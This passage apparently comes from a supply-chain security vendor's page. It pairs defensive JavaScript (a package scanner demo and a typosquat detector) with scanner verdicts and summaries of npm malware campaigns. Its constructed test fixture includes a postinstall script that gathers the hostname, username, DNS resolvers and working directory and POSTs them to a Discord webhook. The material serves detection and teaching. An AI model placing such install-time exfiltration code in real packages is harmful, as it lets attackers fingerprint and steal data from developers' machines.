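  name: 'sample-recon-pkg',
  version: '1.0.0',
  scripts: { postinstall: 'node index.js' },
  dependencies: {
    axios: '^1.6.0',
    'left-pad': 'github:someuser/left-pad',
    'helper-lib': 'https://example.invalid/helper-1.0.0.tgz',
  },
};
const SAMPLE_INDEX_JS = `
const os = require('os');
const dns = require('dns');
const https = require('https');
const data = JSON.stringify({
  host: os.hostname(), user: os.userInfo().username,
  resolvers: dns.getServers(), cwd: process.cwd(),
});
const req = https.request('https://discord.com/api/webhooks/0/constructed', { method: 'POST' });
req.end(data);
`;

// Constructed benign package for comparison: registry-only deps, no hooks.
const BENIGN_PACKAGE_JSON = { name: 'plain-lib', version: '2.0.0', dependencies: { lodash: '^4.17.21' } };
const BENIGN_INDEX_JS = 'module.exports = (a, b) => a + b;\n';

const sampleFindings = scanPackage(SAMPLE_PACKAGE_JSON, { 'index.js': SAMPLE_INDEX_JS });
console.log(riskLevel(sampleFindings), sampleFindings);
```

To run this against a real tarball, `npm pack <name>` fetches it without executing any lifecycle script; unpack it, load package/package.json and the JS files, and pass them in. The same check belongs in CI as a gate, and `npm install --ignore-scripts` is the blunt instrument when a package has to be installed before it can be reviewed.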

github.com/typenameman/rosy-go

v0.0.0-20220106011716-b738fea76657

Live on Go Modules

Blocked by Socket

The code exhibits clear malicious and suspicious behavior: credential harvesting, insecure cryptography, exfiltration of local assets, and automated interaction with protected endpoints on an attacker-controlled domain. In a supply-chain context, inclusion of this module would create severe security risks, including unauthorized data access and data leakage. This code should be treated as dangerous, blocked, and subjected to thorough review and remediation (remove hardcoded secrets, implement secure cryptography with randomized IVs, strengthen error handling, and prevent exfiltration of local files).

@synsci/cli-windows-x64-baseline

1.1.88

by syntheticsciences

Live on npm

Blocked by Socket

[Skill Scanner] Installation of third-party script detected (AITech 9.1.4) [SC006]

klu-web-ui

0.0.50

by jorgediazklu

Live on npm

Blocked by Socket

The code is highly suspicious and potentially malicious. It fetches and executes remote HTML content from a suspicious domain without sanitization, exposing users to XSS and malware injection risks. This behavior is indicative of a supply chain security incident and should be treated as high risk. The component should be removed or thoroughly audited before use.

Detect and block software supply chain attacks

Socket detects traditional vulnerabilities (CVEs) but goes beyond that to scan the actual code of dependencies for malicious behavior. It proactively detects and blocks 70+ signals of supply chain risk in open source code, for comprehensive protection.

Possible typosquat attack

Known malware

Git dependency

GitHub dependency

AI-detected potential malware

HTTP dependency

Obfuscated code

Suspicious Stars on GitHub

Telemetry

Protestware or potentially unwanted behavior

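The first signal in the list above, "Possible typosquat attack", is the one most readers will want to reproduce locally. The following is an added example, not Socket's typosquat logic. It normalises a candidate name (case, separators, and the digit-for-letter swaps squatters favour) and then measures optimal-string-alignment edit distance, which counts a transposition such as "lodahs" as a single edit, against a list of well-known package names. The popular-package list here is a constructed sample; in practice it would be the top few thousand names by download count, and scoped names should be compared on their unscoped part.

```javascript
// Added example, not Socket's typosquat detection. The popular-package list is a
// constructed sample; swap in a real top-N list by downloads for actual use.
const POPULAR_PACKAGES = ['lodash', 'express', 'react', 'axios', 'chalk', 'left-pad', 'jquery', 'moment', 'commander'];

// Look-alike digits commonly substituted for letters in squatted names.
const CONFUSABLES = { 0: 'o', 1: 'l', 3: 'e', 5: 's' };

function normalizeName(name) {
  return name.toLowerCase().replace(/[-_.]/g, '').replace(/[0135]/g, (c) => CONFUSABLES[c]);
}

// Optimal string alignment distance: insert, delete, substitute, or swap two adjacent chars.
function osaDistance(a, b) {
  const d = Array.from({ length: a.length + 1 }, () => new Array(b.length + 1).fill(0));
  for (let i = 0; i <= a.length; i++) d[i][0] = i;
  for (let j = 0; j <= b.length; j++) d[0][j] = j;
  for (let i = 1; i <= a.length; i++) {
    for (let j = 1; j <= b.length; j++) {
      const cost = a[i - 1] === b[j - 1] ? 0 : 1;
      d[i][j] = Math.min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost);
      if (i > 1 && j > 1 && a[i - 1] === b[j - 2] && a[i - 2] === b[j - 1]) {
        d[i][j] = Math.min(d[i][j], d[i - 2][j - 2] + 1); // adjacent transposition
      }
    }
  }
  return d[a.length][b.length];
}

// Returns the popular packages a name could be impersonating, closest first.
// The allowed distance is scaled down for short names so that five-letter
// packages need a one-edit match; otherwise almost everything short collides.
function typosquatCandidates(name, popular = POPULAR_PACKAGES, maxDistance = 2) {
  const hits = [];
  if (popular.includes(name)) return hits; // it is the real package
  const norm = normalizeName(name);
  for (const p of popular) {
    const pNorm = normalizeName(p);
    if (norm === pNorm) {
      hits.push({ target: p, distance: 0, reason: 'confusable' });
      continue;
    }
    const dist = osaDistance(norm, pNorm);
    if (dist <= Math.min(maxDistance, Math.floor(pNorm.length / 3))) {
      hits.push({ target: p, distance: dist, reason: 'near-miss' });
    }
  }
  return hits.sort((x, y) => x.distance - y.distance);
}

for (const n of ['lodahs', 'l0dash', 'left_pad', 'react', 'some-unrelated-thing']) {
  console.log(n, typosquatCandidates(n));
}
```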

Detect suspicious package updates in real-time

Socket detects and blocks malicious dependencies, often within just minutes of them being published to public registries, making it the most effective tool for blocking zero-day supply chain attacks.


Developers love Socket

Socket is built by a team of prolific open source maintainers whose software is downloaded over 1 billion times per month. We understand how to build tools that developers love. But don’t take our word for it.


Security teams trust Socket

The best security teams in the world use Socket to get visibility into supply chain risk, and to build a security feedback loop into the development process.


Why teams choose Socket

Pro-active security

Depend on Socket to prevent malicious open source dependencies from infiltrating your app.

Easy to install

Install the Socket GitHub App in just 2 clicks and get protected today.

Comprehensive open source protection

Block 70+ issues in open source code, including malware, typo-squatting, hidden code, misleading packages, permission creep, and more.

Develop faster

Reduce work by surfacing actionable security information directly in GitHub. Empower developers to make better decisions.

Supply chain attacks are on the rise

Attackers have taken notice of the opportunity to attack organizations through open source dependencies. Supply chain attacks rose a whopping 700% in the past year, with over 15,000 recorded attacks.

Nov 23, 2025

Shai Hulud v2

The Shai Hulud v2 campaign uses a preinstall script (setup_bun.js) and a loader (setup_bin.js) that installs or locates Bun and then executes an obfuscated, bundled malicious script (bun_environment.js) with its output suppressed.

Nov 05, 2025

Elves on npm

A surge of auto-generated "elf-stats" npm packages is being published from new accounts, roughly one every two minutes. These packages contain simple malware variants and are being rapidly removed by npm. At least 420 unique packages have been identified, some of which mention a capture-the-flag challenge or test.

Jul 04, 2025

RubyGems Automation-Tool Infostealer

Since at least March 2023, a threat actor using multiple aliases uploaded 60 malicious gems to RubyGems that masquerade as automation tools (Instagram, TikTok, Twitter, Telegram, WordPress, and Naver). The gems display a Korean Glimmer-DSL-LibUI login window, then exfiltrate the entered username/password and the host's MAC address via HTTP POST to threat actor-controlled infrastructure.

Mar 13, 2025

North Korea's Contagious Interview Campaign

Since late 2024, we have tracked hundreds of malicious npm packages and supporting infrastructure tied to North Korea's Contagious Interview operation, with tens of thousands of downloads targeting developers and tech job seekers. The threat actors run a factory-style playbook: recruiter lures and fake coding tests, polished GitHub templates, and typosquatted or deceptive dependencies that install or import into real projects.

Jul 23, 2024

Network Reconnaissance Campaign

A malicious npm supply chain attack that leveraged 60 packages across three disposable npm accounts to fingerprint developer workstations and CI/CD servers during installation. Each package embedded a compact postinstall script that collected hostnames, internal and external IP addresses, DNS resolvers, usernames, home and working directories, and package metadata, then exfiltrated this data as a JSON blob to a hardcoded Discord webhook.

Ready to dive in?

Get protected by Socket with just 2 clicks.


The latest from the Socket team

Get our latest security research, open source insights, and product updates.
